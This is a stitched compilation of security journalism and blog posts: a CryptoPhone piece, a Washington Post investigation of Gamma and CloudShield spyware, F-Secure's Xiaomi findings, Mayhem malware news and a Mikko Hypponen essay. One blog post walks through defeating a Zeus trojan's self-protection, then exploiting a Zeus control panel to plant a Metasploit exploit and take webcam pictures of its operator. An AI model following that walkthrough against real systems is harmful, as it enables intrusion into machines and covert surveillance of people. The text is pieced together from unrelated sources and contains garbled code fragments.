Though Goldsmith won’t disclose sales figures or even a retail price for the GSMK CryptoPhone 500, he doesn’t dispute an MIT Technology Review article from this past spring reporting that he produces about 400 phones per week for $3,500 each.  So should ordinary Americans skip some car payments to be able to afford to follow suit?

It depends on what level of security you expect, and who you might reasonably expect to be trying to listen in, says Oliver Day, who runs Securing Change, an organization that provides security services to non-profits.

“There’s this thing in our industry called “threat modeling,” says Day.  “One of the things you learn is that you have to have a realistic sense of your adversary. Who is my enemy?  What skills does he have?  What are my goals in terms of security?”

If  you’re not realistically of interest to the U.S. government and you never leave the country, then the CryptoPhone is probably more protection than you need. Goldsmith says he sells a lot of phones to executives who do business in Asia.  The aggressive, sophisticated hacking teams working for the People’s Liberation Army have targeted American trade secrets, as well as political dissidents.

Day, who has written a paper about undermining censorship software used by the Chinese government, recommends people in hostile communications environments watch what they say over the phone and buy disposable “burner” phones that can be used briefly and then discarded.

“I’m not bringing anything into China that I’m not willing to throw away on my return trip,” says Day.


Goldsmith warns that a “burner phone” strategy can be dangerous.  If Day were to call another person on the Chinese government’s watch list, his burner phone’s number would be added to the watch list, and then the government would watch to see who else he called.  The CryptoPhone 500, in addition to alerting the user whenever it’s under attack, can “hide in plain sight” when making phone calls.  Though it does not use standard voice-over-IP or virtual private network security tools, the CryptoPhone can make calls using just a WI-FI connection — it does not need an identifiable SIM card.  When calling over the Internet, the phone appears to eavesdroppers as if it is just browsing the Internet.

U.S. firm helped the spyware industry build a potent digital weapon for sale overseas


CloudShield Technologies, a California defense contractor, dispatched a senior engineer to Munich in the early fall of 2009. His instructions were unusually opaque.

As he boarded the flight, the engineer told confidants later, he knew only that he should visit a German national who awaited him with an off-the-books assignment. There would be no written contract, and on no account was the engineer to send reports back to CloudShield headquarters.

His contact, Martin J. Muench, turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession. Gamma Group, the British conglomerate for which Muench was a managing director, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will.

[Read: How to implant a Trojan Horse: a user manual]

According to accounts the engineer gave later and contemporary records obtained by The Washington Post, he soon fell into a shadowy world of lucrative spyware tools for sale to foreign security services, some of them with records of human rights abuse.

Over several months, the engineer adapted Gamma’s digital weapons to run on his company’s specialized, high-speed network hardware. Until then CloudShield had sold its CS-2000 device, a multipurpose network and content processing product, primarily to the Air Force and other Pentagon customers, who used it to manage and defend their networks, not to attack others.

CloudShield’s central role in Gamma’s controversial work — fraught with legal risk under U.S. export restrictions — was first uncovered by Morgan Marquis-Boire, author of a new report released Friday by the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. He shared advance drafts with The Post, which conducted its own month-long investigation.


The prototype that CloudShield built was never brought to market, and the company parted ways with Gamma in 2010. But Marquis-Boire said CloudShield’s work helped pioneer a new generation of “network injection appliances” sold by Gamma and its Italian rival, Hacking Team. Those devices harness malicious software to specialized equipment attached directly to the central switching points of a foreign government’s national Internet grid.

The result: Merely by playing a YouTube video or visiting a Microsoft Live service page, for instance, an unknown number of computers around the world have been implanted with Trojan horses by government security services that siphon their communications and files. Google, which owns YouTube, and Microsoft are racing to close the vulnerability.

Citizen Lab’s report, based on leaked technical documents, is the first to document that commercial spyware companies are making active use of this technology. Network injection allows products built by Gamma and Hacking Team to insert themselves into an Internet data flow and change it undetectably in transit.

The report calls that “hacking on easy mode,” in which “compromising a target becomes as simple as waiting for the user to view unencrypted content on the Internet.”

Attacks of that kind were the stuff of hacker imaginings until this year, when news accounts based on documents provided by former National Security Agency contractor Edward Snowden described a somewhat similar NSA program code-named QUANTUMINSERT.


“It has been generally assumed that the best funded spy agency in the world would possess advanced capability,” the Citizen Lab report says. “What is perhaps more surprising is that this capability is being developed by Western vendors for sale on the commercial market.”

Hacking Team and the company that now owns CloudShield denied any wrongdoing. Messages left with Gamma went unreturned.

The “custom payload” that Hacking Team uses to compromise YouTube injects malicious code into the video stream when a visitor clicks the play button. The user sees the “cute animal videos” he expects, according to Citizen Lab, but the malicious code exploits a flaw in Adobe’s Flash video player to take control of the computer.

Another attack, custom-built for use on Microsoft pages, uses Oracle’s Java technology, another common browser component, to insert a back door into a victim’s computer.

Security and privacy advocates have identified those vulnerabilities before, but the two companies regarded them as hypothetical. In response to a bug report in September 2012, which warned of a potential YouTube attack, Google’s security team responded that the use of unencrypted links to send video “is expected behavior.” Google closed the discussion with the tag “WontFix.”

‘Against our will’

After Marquis-Boire disclosed to them confidentially last month that their services are under active attack, Google and Microsoft began racing to close security holes in networks used by hundreds of millions of users.

“I want to be sure there’s no technical means for people to take a user’s data against our will,” Eric Grosse, Google’s vice president for security engineering, said in an interview. “If they want to do that, they need to use legal means and we pursue that.”

Google and Microsoft executives said they are accelerating previous plans to encrypt their links to users across a wider range of their services. Encryption scrambles e-mail, stored files, video and other content as it travels from their servers to a user’s computer or mobile device. That step, as far as security engineers know, effectively prevents most attacks in current use.

Since learning of Marquis-Boire’s findings in mid-July, Google has encrypted a majority of YouTube video links, and Microsoft has changed default settings to prevent unencrypted log-ins on most services.

“There’s a lot of products to update so we’re not at 100 percent yet but we’re actively engaged with all the teams,” Grosse said, acknowledging that Google Maps, Google Earth and other services still connect to users in ways that can easily be intercepted.

Grosse said comprehensive use of encryption should now be regarded as a basic responsibility of Internet services to their users.

“We’re probably already [encrypted] to a sufficiently high level that I would guess our adversaries are already having to scramble and shift to some other widely-used service that has not gone to SSL,” he said, referring to a form of encryption called the secure socket layer, which is indicated by a padlock icon on some browsers.

Matt Thomlinson, Microsoft’s vice president of security, said in a statement that his company “would have significant concerns if the allegations of an exploit being deployed are true.”

“We have been rolling out advanced security across our web properties to continue to help protect our customers,” he added.

In computer circles, any unencrypted data is known as “cleartext.” Marquis-Boire, expanding on a theme that other security researchers have emphasized since disclosures of National Security Agency programs began 14 months ago, said “the big take-away is that cleartext is just dead.”

“Unencrypted traffic is untrustworthy,” he said. “I would describe this as a sad reality of today’s Internet. The techno-Utopian, libertarian ideology of the ’90s didn’t foresee that the Internet would be as militarized as it is now. People with authority and power have decided to reserve the right to ‘own’ Internet users at the core. So in order to be safe you need to walk around everywhere wrapped in encryption.”

‘Lawful intercept’

The computer exploitation industry markets itself to foreign government customers in muscular terms. One Gamma brochure made public by WikiLeaks described its malware injection system, called FinFly ISP, as a “strategic, countrywide” solution with nearly unlimited “scalability,” or capacity for expansion. Hacking Team, similarly, says it provides “effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities.”

In rare comments to the general public, the companies use the term “lawful intercept” to describe their products and say they do not sell to customers on U.S., European or U.N. black lists.

“Our software is designed to be used and is used to target specific subjects of investigation,” said Eric Rabe, a U.S.-based spokesman for Hacking Team, in an extended e-mail interview. “It is not designed or used to collect data from a general population of a city or nation.”

He declined to discuss details of the Citizen Lab report, which is based in part on internal company documents leaked to Marquis-Boire, but he appeared to acknowledge indirectly that the material was authentic.

“We believe the ongoing Citizen Lab efforts to disclose proprietary Hacking Team information is misguided, because, if successful for Citizen Lab, it not only harms our business but also gives the advantage to criminals and terrorists,” he said.

CloudShield’s founder, Peder Jungck, who oversaw the company’s relationship with Gamma before departing for a job with the British defense giant BAE Systems, did not respond to requests for comment.

Confidants of the CloudShield engineer, who has since left the company after becoming disillusioned with its surveillance work, identified him as Eddy Deegan, a British citizen. Deegan’s LinkedIn profile says he worked for the company as a professional services engineer during the period in question. Reached by telephone in France, Deegan declined to confirm or deny the identity of his external customer in late 2009.

“Nothing came of the work I was involved in at the time,” he said. “I asked, and was assured that nothing illegal was undertaken. I have no further comment.”

U.S. export restrictions, enforced by the Commerce Department, require a license for any foreign sale of technology described in the relevant statute as “primarily useful for the purpose of the surreptitious interception of wire, oral, or electronic communications.”

Jennifer Gephart, the media relations director for Leidos, which now owns CloudShield, declined to say whether the company had applied for an export license for the Gamma project. The transactions in question took place “prior to our company’s acquisition of CloudShield,” she said, but “to our knowledge” they were “handled in accordance with applicable regulations.”

Gephart confined her statement to the sale of CloudShield’s CS-2000 hardware. When asked about the company’s development of custom software to turn the device into a spyware delivery system, she declined to respond.

Robert Clifton Burns, who specializes in export controls at the law firm Bryan Cave, said that “surreptitious listening devices are covered and the software for that is also covered on the Commerce Control List.”

The regulations are complex and inconsistent, he said, and an authoritative legal judgment would require more facts. CloudShield might argue, he said, that malware injection is not “primarily useful” for surreptitious eavesdropping because it can also be used to track a target’s location, take photographs or steal electronic files. Although more intrusive, those attacks were not covered under the rules that applied in 2009.

The Gamma Group lists no e-mail address or telephone number on its Web site. No one responded to a lengthy note left on the company’s “Contact” page.

Muench, who has left his old job for a new position in France, read a LinkedIn message requesting an interview. He did not respond. In the past he has dismissed human rights concerns as unproven and defended Gamma’s products as vital for saving innocent lives. “The most frequent fields of use are against pedophiles, terrorists, organized crime, kidnapping and human trafficking,” he told the New York Times two years ago.

Security researchers have documented clandestine sales of Gamma and Hacking Team products to “some of the world’s most notorious abusers of human rights,” said Ron Deibert, the director of Citizen Lab, a list that includes Turkmenistan, Egypt, Bahrain and Ethiopia.

At CloudShield, executives knew the identity of at least one prospective customer for the system Deegan built. A former manager told The Post, with support from records obtained elsewhere, that CloudShield sent Deegan to Oman to plan a deployment for one of the country’s internal security services. The sale did not go through.

In its annual assessment of human rights that year, the State Department reported that Oman “monitored private communications” without legal process in order to “suppress criticism of government figures and politically objectionable views.”

‘A push market’

CloudShield did not see itself as a cloak-and-dagger company. It made its name for high-end hardware that could peer deeply into Internet traffic and pull out and analyze “packets” of data as they flew by.

The flagship product five years ago, the CS-2000, could not only look inside the data flow, but select parts of it to copy or reroute. That made it a good tool for filtering out unwanted data or blocking certain forms of cyberattack.

But hardware that could block data selectively could also rewrite innocent traffic to include malicious code. That meant the CloudShield product could be used for attack as well as defense, a former executive said.

CloudShield began pitching its product for offensive use, focusing on U.S. customers because of export controls.

“The basic motivations are pretty straightforward,” said one former senior manager there. “It was a push market. We were trying to sell boxes. It was a very conscious effort to target lawful intercept as a space where you could legitimately apply these kinds of technologies.”

Two former employees said that Muench, the Gamma executive, traveled to Sunnyvale, Calif., in 2009 in hopes of striking a business relationship. Jungck, CloudShield’s founder and chief technology officer, said he could not export that kind of technology and sent Muench home.

But the leadership team reconsidered, and hit upon a plan. They believed that Deegan could do the work for Gamma without triggering U.S. export controls as long as CloudShield’s U.S. operations had nothing to do with it.

“I think we all had qualms in the beginning,” said one former executive who took part in the deliberations. “I think we rationalized a way in which we felt comfortable with it. Part of that rationalization was to keep it outside the U.S., limit it to that environment where that project was.”

What first appeared as an absorbing technical challenge for Deegan began to take a darker cast. His prototype system could inject any of “254 trojans,” or all of them, into a targeted computer. If it failed once, it would keep trying, up to 65,000 times.

He was proud of his technical accomplishments, he told confidants, but was no longer sure he had done the right thing. After meeting prospective customers in Oman, his qualms grew worse.

In the end, the Oman deal fell through, and other efforts, with other partners failed, too. CloudShield and Gamma parted ways, and Gamma found another hardware supplier. Deegan’s prototype, according to Marquis-Boire and a CloudShield insider, may have sped development of the flagship surveillance product that Gamma brought to market the following year.

Julie Tate contributed to this report.



Security firm shows Xiaomi smartphones secretly stealing your data


Nampaknya telepon Xiaomi mengirimkan data dari telepon langsung ke pusatnya Xiaomi.

Menurut dokumen ‘Privacy Policy’ Xiaomi di , nampaknya memang ada data-data tertentu yang dikirim dari smartphone tersebut ke Xiaomi.


Security firm shows Xiaomi smartphones secretly stealing your data (Updated)

Update 2: Hugo Barra has now confirmed with us that the OTA update that will make MIUI’s Cloud Messaging service opt-in will be available for all Xiaomi phones.

Update: Hugo Barra has now addressed F-Secure’s findings, stating that the data being uploaded is part of MIUI’s Cloud Messaging service. An update rolling out today will now make MIUI opt-in, and will no longer automatically activate for new users:

These concerns refer to the MIUI Cloud Messaging service described above. As we believe it is our top priority to protect user data and privacy, we have decided to make MIUI Cloud Messaging an opt-in service and no longer automatically activate users. We have scheduled an OTA system update for today (Aug 10th) to implement this change.

After the upgrade, new users or users who factory reset their devices can enable the service by visiting “Settings > Mi Cloud > Cloud Messaging” from their home screen or “Settings > Cloud Messaging” inside the Messaging app — these are also the places where users can turn off Cloud Messaging.

Following allegations that Xiaomi phones may be silently uploading user details to a remote server, Finnish security firm F-Secure set out to investigate.

The firm has now published a blog detailing how a brand new Xiaomi RedMi 1S smartphone silently uploaded a users’ phone number, the network being used, the phone’s IMEI number, as well as the phone’s entire list of contacts to a Xiaomi server.

The security company said that it took a brand new smartphone from the box with no prior set-up or cloud connect allowed. It then followed the following steps:

  1. Inserted SIM card
  2. Connected to WiFi
  3. Allowed the GPS location service
  4. Added a new contact into the phonebook
  5. Send and received an SMS and MMS message
  6. Made and received a phone call

F-Secure said, “We saw that on startup, the phone sent the telco name to the server It also sent IMEI and phone number to the same server.”

Xiaomi data

Xiaomi data

The company then repeated the above steps but this time connecting to the Mi Cloud service. This time around the IMSI details (used to identify the user of a cellular network) were sent to, as well as the IMEI and phone number.

This evidence seems contrary to Xiaomi Vice President Hugo Barra’s claims when he addressed Xiaomi security concerns in a Google+ post last week, stating “Xiaomi is serious about user privacy and takes all possible steps to ensure our Internet services adhere to our privacy policy. We do not upload any personal information and data without the permission of users.”

Source: F-Secure


How to bypass Zeus trojan self protection mechanism

Hacking spammer’s for Dummies


How to bypass Zeus Trojan’s self protection mechanism


Spammers are good when it comes to intimidating users to open the attachment . One of the recent pathetic and cruel one was


A Person from your office was found dead outside . Please open the picture to see if you know him .


Attachment is basically a Zip file consisting of an exe file named “image.scr” with a nice mspaint icon .

Quickly opening up in IDA will give us a hint that it is basically a VBpacker. VBPackers usually create a hallow suspended process , overwrite the memory and resume within .


After successfully unpacking and fixing the dump we get the following output


OEP the unpacked binary is enough to tell us that it is a Zeus Banking Trojan . Well this one is a different version of Zeus with self-protection which means unpacked ones wont run . This is usually done to “force” the bot masters to buy a Cryptor service .

If you double click the binary it will not run , It will simply exit. Now lets see where things are going wrong and how to bypass the protection

For that purpose we will generate an API call Graph made by the unpacked binary to see the exit point of program .



So from this we got an idea that it is reading file buffer and performing some operations on it and now lets see what operation it is performing on it .

Now if we dig deeper we find out the file buffer is read and the some cryptography operations are performed .


And if go inside CheckSelfProtection() function we will observe that this function will RC4 the whole binary buffer with a static encryption key and will search for placeholder “DAVE”

In my case the RC4 Key was


Packer integrity


We can copy that 0x200 byte data from the packer into the overlay of our unpacked file.

And if found it goes further on verifying the integrity of that data structure and decodes another payload using a 4 byte XOR key taken from that structure.

The Total size of the data Structure is 0x200 bytes and on the basis size, Installer and injector are decrypted . Let now understand the structure of that 0x200 Data Structure.

During installation phase iSizeOfPacket bytes are copied from the data chunk into heap . And then later on used to decode installer subroutine using XOR cipher .


    DWORD  SIGNATURE;SetBackColor( cRed );
    DWORD Crc32HASH;SetBackColor( cBlue );
    WORD iSizeOfPacket;unsignedintSizeOfDecodedData;unsignedintUnknown1;SetBackColor( cRed );unsignedintXorKey;}Zeus_Packer_OverLay;

Before decoding the installer routine CRC32 hash is checked and SizeOfDecodedData data is copied to heap location in this function.


The installer and injector is differentiated by iSizeOfPacket field, if the size is 0x0c then it is still in installation phase if it is 0x1e6 then it has been replaced by installation routine with a new packer data structure .

The installation subroutine is then decoded using Xorkey with a data buffer of size SizeOfDecodedData using this simple XOR function.


During the installation phase the Packer data structure is rewritten and encrypted using RC4 resulting in data of length 0x1e6 which mainly consists of installation data like

1 : Registry Keys
2 : Random Numbers Generated for Seeding .
3 : Local Path Name
4 : Computer Name and Version


Replacing this Packer Overlay data with the old one will let you skip the installation phase and binary wont be relaunched again using CreateProcessA in %appdata%. Yet we will have to patch a jump after it Compares its path in the overlay data with the current path.


Owning a Zeus C2C panel / Spammer

There exists a publicly known RCE vulnerability in some versions of Zeus ( as well as Zeus lite, KINS,ICE-IX) As described in detail here ( . Our good friend Xylitol has already provided a ready to use tool to exploit such vulnerability :

All we need for that is C2C we address and RC4 communication key . Both of them you can get from Base Config Decoding Subroutine which is again based on simple XOR cipher


After getting C2C and RC4 key . It can be submitted here to get a shell on that C2C web panel .


Once you get the shell you can then edit the cp.php ( login file for Zeus panel ) and boost up your Metasploit exploit after the bot master has logged in .


And if you know how to proceed further and you can get a meterpreter shell on the spammers machine . webcam_snap is one beautiful Meterpreter script command which I personally like (

It takes a webcam capture from the victims computer and saves it in the target machine.

And if you enter that , you might get back something like this in your computer :) h.jpg


Ada Malware baru: Mayhem,new-mayhem-malware-targets-linux-unix-servers.aspx

New Mayhem malware targets Linux, UNIX servers

Infections found in Australia and New Zealand.

A new malware that runs on UNIX-like servers even with restricted privileges has already infected machines in Australia and is actively hunting for more targets, a new research paper has shown.

Three researchers from Russian web provider Yandex – Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov – said in the technical analysis of the malware, published on security and anti-virus specialist publication Virus Bulletin, that Mayhem functions like a traditional Windows bot.

Mayhem was discovered in April this year and does not require a privilege escalation vulnerability – it does not have to run as the root super user – to work on Linux-based systems, or on FreeBSD servers.

Servers are infected through the execution of a hypertext preprocessor (PHP) script that establishes Mayhem on the victim computer and sets up a communications channel with a command and control server.

The malware can have different functionality depending on the type of plug-in downloaded to it by the botmaster in control, and stashed away in a hidden file system on the compromised server.

Some of the plug-ins provide brute force cracking of password functionality, while others crawl web pages to scrape information.

According to the researchers, Mayhem appears to be the continuation of the Fort Disco brute-force password cracking attack campaign that began in May 2013.

At the time, Fort Disco had created a botnet with six contral and command sites and over 25,000 infected Windows computers, according to Arbor Networks security analysts.

Mayhem worldwide distribution. Source: Virus Bulletin

A total of 1400 infections have been recorded around the world for Mayhem so far, with most of these in the United States, Russia, Germany and Canada, the researchers said.

Sidorov told iTnews that recently discovered data from the largest Mayhem command and control server showed that there were 14 infected machines in Australia, and two in New Zealand.

Commenting on the research, Virus Bulletin editor Martijn Grooten said the threat Mayhem poses was relatively small compared to existing botnets.

But he warned that Mayhem should be taken seriously nevertheless, as it had the ability to compromise powerful Linux servers and was actively looking for other sites and machines to infect.

“It is another reminder to those running web servers that these have become prime targets for malware authors,” Grooten said.

The researchers warned that despite increasingly being targeted by malware authors, many webmasters who run UNIX-like operating systems don’t have the opportunity to update their infrastructure automatically, and that serious maintenance is expensive and therefore often not undertaken.

This, combined with lack of anti-virus technologies, active defences and process memory checking modules in the UNIX world, meant “it is easy for hackers to find vulnerable web servers and to use such servers in their botnets,” the researchers stated.

Cyber Attacks By Mikko Hypponen


The real world isn’t like the online world.

In the real world, you only have to worry about the criminals who live in your city. But in the online world, you have to worry about criminals who could be on the other side of the planet. Online crime is always international because the Internet has no borders.

Today computer viruses and other malicious software are no longer written by hobbyist hackers seeking fame and glory among their peers. Most of them are written by professional criminals who are making millions with their attacks. These criminals want access to your computer, your PayPal passwords, and your credit card numbers.

I spend a big part of my life on the road, and I’ve visited many of the locations that are considered to be hotspots of online criminal activity. I’ve been to Moscow, São Paulo, Tartu, Vilnius, St. Petersburg, Beijing, and Bucharest.

I’ve met the underground and I’ve met the cops. And I’ve learned that things are never as simple as they seem from the surface. One would think that the epicenter for banking attacks, for example, would prioritize fighting them, right?

Right, but dig deeper and complications emerge. A good example is a discussion I had with a cybercrime investigator in Brazil. We spoke about the problems in Brazil and how São Paulo has become one of the largest sources of banking trojans in the world.

The investigator looked at me and said, “Yes. I understand that. But what you need to understand is that São Paulo is also one of the murder capitals of the world. People are regularly gunned down on the streets. So where exactly should we put our resources? To fight cybercrime? Or to fight crimes where people die?”

It’s all a matter of balancing. When you balance the damage done by cybercrime and compare it to a loss of life, it’s pretty obvious what’s more important.

National police forces and legal systems are finding it extremely difficult to keep up with the rapid growth of online crime. They have limited resources and expertise to investigate online criminal activity. The victims, police, prosecutors, and judges rarely uncover the full scope of the crimes that often take place across international boundaries. Action against the criminals is too slow, the arrests are few and far between, and too often the penalties are very light, especially compared with those attached to
real-world crimes.

Because of the low prioritization for prosecuting cybercriminals and the delays in launching effective cybercrime penalties, we are thereby sending the wrong message to the criminals and that’s why online crime is growing so fast. Right now would-be online criminals can see that the likelihood of their getting caught and punished is vanishingly small, yet the profits are great.

The reality for those in positions like the São Paulo investigator is that they must balance both fiscal constraints and resource limitations. They simply cannot, organizationally, respond to every type of threat. If we are to keep up with the cybercriminals, the key is cooperation. The good news is that the computer security industry is quite unique in the way direct competitors help each other.

The Turning Point

If you were running Windows on your computer 10 years ago, you were running Windows XP. In fact, you were most likely running Windows XP SP1 (Service Pack 1). This is important, as Windows XP SP1 did not have a firewall enabled by default and did not feature automatic updates. So, if you were running Windows, you weren’t running a firewall and you had to patch your system manually—by downloading the patches with Internet Explorer 6, which itself was ridden with security vulnerabilities.

No wonder, then, that worms and viruses were rampant in 2003. In fact, we saw some of the worst outbreaks in history in 2003: Slammer, Sasser, Blaster, Mydoom, Sobig, and so on. They went on to do some spectacular damage. Slammer infected a nuclear power plant in Ohio and shut down Bank of America’s ATM systems. Blaster stopped trains in their tracks outside Washington, D.C., and shut down Air Canada check-in systems at Canadian airports. Sasser thoroughly infected several hospitals in Europe.

The problems with Windows security were so bad that Microsoft had to do something. And they did. In hindsight, they did a spectacular turnaround in their security processes. They started Trustworthy Computing. They stopped all new development for a while to go back and find and fix old vulnerabilities. Today, the difference in the default security level of 64-bit Windows 8 is so much ahead of Windows XP you can’t even compare them.

We’ve seen other companies do similar turnarounds. When the Microsoft ship started to become tighter and harder to attack, the attackers started looking for easier targets. One favorite was Adobe Reader and Adobe Flash. For several years, one vulnerability after another was found in Adobe products, and most users were running badly outdated products as updating wasn’t straightforward. Eventually Adobe got their act together. Today, the security level of, say, Adobe Reader, is so much ahead of older readers you can’t even compare them.

The battle at hand right now is with Java and Oracle. It seems that Oracle hasn’t gotten their act together yet. And maybe don’t even have to: users are voting with their feet and Java is already disappearing from the web.

The overall security level of end-user systems is now better than ever before. The last decade has brought us great improvements. Unfortunately, the last decade has also completely changed who were fighting.

In 2003, all the malware was still being written by hobbyists, for fun. The hobbyists have been replaced by new attackers: not just organized criminals, but also hacktivists and governments. Criminals and especially governments can afford to invest in their attacks. As an end result, we’re still not safe with our computers, even with all the great improvements.

But at least we don’t see flights grounded and trains stopped by malware every other week, like we did in 2003.

Crypto Currencies

In 2008, a mathematician called Satoshi Nakamoto submitted a technical paper for a cryptography conference. The paper described a peer-to-peer network where participating systems would do complicated mathematical calculations on something called a blockchain. This system was designed to create a completely new currency: a crypto currency. In short, a currency that is based on math. The paper was titled “Bitcoin: A Peer-to-Peer Electronic Cash System.”

Since Bitcoin is not linked to any existing currency, its value is purely based on the value people believe it’s worth. And since it can be used to do instant transactions globally, it does have value. Sending Bitcoins around is very much like sending e-mail. If I have your address, I can send you money. I can send it to you instantly, anywhere, bypassing exchanges, banks, and the tax man. In fact, crypto currencies make banks unnecessary for moving money around—which is why banks hate the whole idea.

The beauty of the algorithm behind Bitcoin is solving two main problems of crypto currencies by joining them: how do you confirm transactions and how do you inject new units of currency into the system without causing inflation. Since there is no central bank in the system, the transactions need to be confirmed somehow—otherwise one could fabricate fake money. In Bitcoin, the confirmations are done by other members of the peer-to-peer network. At least six members of the peer-to-peer network have to confirm the transactions before they go through. But why would anybody confirm transactions for others? Because they get rewarded for it: the algorithm issues new Bitcoins as reward to users who have been participating in confirmations. This is called mining.

When Bitcoin was young, mining was easy and you could easily make dozens of Bitcoins on a home computer. However, as Bitcoin value grew, mining became harder since there were more people interested in doing it. Even though the dollar-to-BTC exchange rate has fluctuated, fact remains that in the beginning of 2013, the exchange rate for the U.S. dollar to a Bitcoin was $8 and by the fall it was $130. So Bitcoins now have very real real-world value.

When Bitcoins became valuable, people were more and more interested in Satoshi Nakamoto. He gave a few e-mail interviews, but eventually stopped correspondence altogether. Then he disappeared. When people went looking for him, they realized Satoshi Nakamoto didn’t exist. Even today, nobody knows who invented Bitcoin. Indeed, however, Bitcoin fans have been spotted wearing T-shirts saying “Satoshi Nakamoto Died for Our Sins.”

Today, there are massively large networks of computers mining Bitcoins and other competing crypto currencies (such as Litecoin). The basic idea behind mining is easy enough: if you have powerful computers, you can make money. Unfortunately, those computers don’t have to be your own computers. Some of the largest botnets run by online criminals today are monetized by mining. So, you’d have an infected home computer of a grandmother in, say, Barcelona, running Windows XP at 100 percent utilization around the clock as it is mining coins worth tens of thousands of dollars a day for a Russian cybercrime gang. It’s easy to see that such mining botnets will become very popular for online criminals in the future.

Even more importantly, such an attack does not require a user for the computers in order to make money. Most traditional botnet monetization mechanisms required a user’s presence. For example, credit card keyloggers needed a user at the keyboard to type in his payment details or ransom trojans needed a user to pay a ransom in order to regain access to his computer or his data. Mining botnets just need processing power and a network connection.

Some of the upcoming crypto currencies do not need high-end GPUs to do the mining: a regular CPU will do. When you combine that with the fact that home automation and embedded devices are becoming more and more common, we can make an interesting forecast: there will be botnets that will be making money by mining on botnets created out of embedded devices. Think botnets of infected printers or set-top boxes or microwave ovens. Or toasters.

Whether it makes sense or not, toasters with embedded computers and Internet connectivity will be reality one day. Before crypto currencies existed, it would have been hard to come up with a sensible reason for why anybody would want to write malware to infect toasters. However, mining botnets of thousands of infected toasters could actually make enough money to justify such an operation. Sooner or later, this will happen.


Spying is about collecting information. When information was still written on pieces of paper, a spy had to physically go and steal it. These days information is data on computers and networks, so modern spying is often carried out with the help of malware. The cyber spies use trojans and backdoors to infect their targets’ computers, giving them access to the data even from the other side of the world.

Who spends money on spying? Companies and countries do. When companies do it, it’s called industrial espionage. When countries do it, it’s just espionage.

In the most typical case, the attack is made through e-mail to a few carefully selected people or even a single person in the organization. The target receives what seems like an ordinary e-mail with an attached document, often from a familiar person. In reality, the whole message is a forgery. The e-mail sender’s details are forged and the seemingly harmless attached document contains the attack code. If the recipient does not realize the e-mail is a forgery, the whole case will probably go unnoticed, forever.

Program files like Windows EXE files do not get through firewalls and filters, so the attackers commonly use PDF, DOC, XLS, and PPT document files as the attachment. These are also more likely to be viewed as safe documents by the recipient. In their standard form these file types do not contain executable code, so the attackers use vulnerabilities in applications like Adobe Reader and Microsoft Word to infect the computer when the booby-trapped documents are opened.

The structure of these attack files has been deliberately broken so that it crashes the office application in use when opened, while simultaneously executing the binary code inside the document. This code usually creates two new files on the hard disk and executes them. The first is a clean document that opens up on the user’s monitor and distracts the user from the crash.

The second new file is a backdoor program that starts immediately and hides itself in the system, often using rootkit techniques. It establishes a connection from the infected computer to a specific network address, anywhere in the world. With the help of the backdoor the attacker gains access to all the information on the target computer, as well as the information in the local network that the targeted person has access to.

The attacks often use backdoor programs like Gh0st RAT or Poison Ivy to remotely monitor their targets. With such tools, they can do anything they want on the target machine. This includes logging the keyboard to collect passwords and a remote file manager to search documents with interesting content. Sometimes the attackers can eavesdrop on their target by remotely controlling the microphone of the infected computer.

I’ve been tracking targeted spying attacks since they were first observed in 2005. Targets have included large companies, governments, ministries, embassies, and nonprofit organizations like those who campaign for the freedom of Tibet, support minorities in China, or represent the Falun Gong religion. It would be easy to point the finger at the government of China. But we don’t have the smoking gun. Nobody can conclusively prove the origin of these attacks. In fact, we know with a high degree of certainty that several governments are engaging in similar attacks.

It’s also clear that what we’ve seen so far is just the beginning. Online espionage and spying can only become a more important tool for intelligence purposes in the future. Protecting against such attacks can prove to be very difficult.

The most effective method to protect data against cyber spying is to process confidential information on dedicated computers that are not connected to the Internet. Critical infrastructure should be isolated from public networks.

And isolation does not mean a firewall: it means being disconnected. And being disconnected is painful, complicated, and expensive. But it’s also safer.


A very big part of criminal or governmental cyber attacks use exploits to infect the target computer.

Without a vulnerability, there is no exploit. And ultimately, vulnerabilities are just bugs: programming errors. And we have bugs because programs are written by human beings and human beings make errors. Software bugs have been a problem as long as we’ve had programmable computers, and they aren’t going to disappear.

Before the Internet became widespread, bugs weren’t very critical. You would be working on a word processor and would open a corrupted document file and your word processor would crash. While annoying, such a crash wasn’t too big of a deal. You might lose any unsaved work in open documents, but that’s it. But as soon as the Internet entered the picture, things changed. Suddenly bugs that used to be just a nuisance could suddenly be used to take over your computer.

We have different classes of vulnerabilities and their severity ranges from a nuisance to critical.

First, we have local and remote vulnerabilities. Local vulnerabilities can only be exploited by a local user who already has access to the system. But remote vulnerabilities are much more severe as they can be exploited from anywhere over a network connection.

Vulnerability types can then be divided by their actions on the target system: denial-of-service, privilege escalation, or code execution. Denial-of-service vulnerabilities allow the attacker to slow down or shut down the system. Privilege escalations can be used to gain additional rights on a system, and code execution allows running commands.

The most serious vulnerabilities are remote code execution vulnerabilities. And these are what the attackers need.

But even the most valuable vulnerabilities are worthless if the vulnerability gets patched. So the most valuable exploits are targeting vulnerabilities that are not known to the vendor behind the exploited product. This means that the vendor cannot fix the bug and issue a security patch to close the hole. If a security patch is available and the vulnerability starts to get exploited by the attackers five days after the patch came out, users had five days to react. If there is no patch available, they users had no time at all to secure themselves: literally zero days. This is where the term zero-day vulnerability comes from: users are vulnerable, even if they had applied all possible patches.

The knowledge of the vulnerabilities needed to create these exploits is gathered from several sources. Experienced professionals search for vulnerabilities systematically by using techniques like fuzzing or by reviewing the source code of open-source applications, looking for bugs. Specialist tools have been created to locate vulnerable code from compiled binaries. Less experienced attackers can find known vulnerabilities by reading securitythemed mailing lists or by reverse engineering security patches as they are made available by the affected vendors. Exploits are valuable even if a patch is available, as there are targets that don’t patch as quickly as they should.

Originally, only hobbyist malware writers were using exploits to do offensive attacks. Worms like Code Red, Sasser, and Blaster would spread around the world in minutes as they could remotely infect their target with exploits.

Things changed as organized criminal gangs started making serious money with keyloggers, banking trojans, and ransom trojans. As money entered the picture, the need for fresh exploits created an underground marketplace. Things changed even more as governments entered the picture. As the infamous Stuxnet malware was discovered in July 2010, security companies were amazed to notice this unique piece of malware was using a total of four different zero-day exploits—which remains a record in its own field. Stuxnet was eventually linked to an operation launched by the governments of the United States and Israel to target various objects in the Middle East and to especially slow down the nuclear program of the Islamic Republic of Iran.

